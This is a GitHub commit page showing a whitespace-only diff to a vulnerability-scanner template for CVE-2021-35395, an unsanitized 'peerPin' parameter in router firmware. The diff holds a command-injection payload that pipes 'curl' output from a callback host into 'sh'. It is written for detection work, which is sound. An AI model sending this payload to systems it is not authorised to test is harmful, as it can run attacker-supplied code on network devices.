Skip to content

Commit

Permalink
Fix indentation and trailing whitespace
Browse files Browse the repository at this point in the history
  • Loading branch information
king-alexander committed Oct 5, 2023
1 parent 5416d4c commit 6803ac8
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion http/cves/2021/CVE-2021-35395.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -16,7 +16,7 @@ http:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
# The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
matchers:
- type: word
Expand Down

0 comments on commit 6803ac8

Please sign in to comment.